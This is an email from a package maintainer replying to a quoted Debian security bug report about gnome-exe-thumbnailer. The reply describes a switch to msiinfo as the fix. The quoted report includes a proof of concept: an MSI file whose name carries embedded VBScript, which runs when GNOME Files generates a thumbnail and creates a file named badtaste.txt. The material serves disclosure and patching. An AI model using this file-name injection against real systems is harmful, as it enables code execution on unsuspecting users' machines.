Hi Nils, I wasn't able to reproduce the exploit on my (64-bit) system with either Caja and Nautilus (it also required setting up a new wineprefix in ~/.wine). The msi thumbnail ended up generating without any version information tag at all.
Regardless, I've gone and replaced the VBScript-based parsing entirely with msitools' msiinfo in https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1d8e3102dd8fd23431ae6127d14a236da6b4a4a5; hopefully this should fix the issue. I'll tag a new release soon and look at pushing the fix to Debian. (Also CC'ing the other maintainers, who I don't think are on the Debian Wine list) Best, James On 18/07/17 05:01 AM, Nils Dagsson Moskopp wrote: > Package: gnome-exe-thumbnailer > Version: 0.9.4-2 > Severity: grave > Tags: security > Justification: user security hole > > Dear Maintainer, > > the following PoC is copied verbatim from my post about the parsing issue: > http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html > > Proof of Concept > > Install Dependencies > > On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and > wixl. The wixl package is only needed to create MSI files that trigger the > thumbnailer. > > If the proof of concept does not work, install winetricks and run winetricks > wsh56 to upgrade the Windows Script Host. > > Create MSI Files > > Create a file named poc.xml with the following content: > > <?xml version="1.0" encoding="utf-8"?> > <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi";> > <Product Version="1.0"/> > </Wix> > > Execute the following Bourne Shell code: > > wixl -o poc.msi poc.xml > cp poc.msi "poc.msi\",0):Set > fso=CreateObject(\"Scripting.FileSystemObject\"):Set > poc=fso.CreateTextFile(\"badtaste.txt\")'.msi" > > Trigger Execution > > Start GNOME Files and navigate to the folder with the MSI files. An empty > file with the name badtaste.txt should appear. > > *** End of the template - remove these template lines *** > > > -- System Information: > Debian Release: 9.0 > APT prefers stable > APT policy: (500, 'stable') > Architecture: i386 (i686) > > Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core) > Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) > Shell: /bin/sh linked to /bin/dash > Init: sysvinit (via /sbin/init) > > Versions of packages gnome-exe-thumbnailer depends on: > ii icoutils 0.31.2-1.1 > ii imagemagick 8:6.9.7.4+dfsg-11 > ii imagemagick-6.q16 [imagemagick] 8:6.9.7.4+dfsg-11 > ii libglib2.0-bin 2.50.3-2 > > Versions of packages gnome-exe-thumbnailer recommends: > pn wine > <none> > pn wine64-tools | wine32-tools | wine64-development-tools | wine32-dev > <none> > > gnome-exe-thumbnailer suggests no packages. > > -- no debconf information > > _______________________________________________ > pkg-wine-party mailing list > pkg-wine-pa...@lists.alioth.debian.org > http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-wine-party >
signature.asc
Description: OpenPGP digital signature
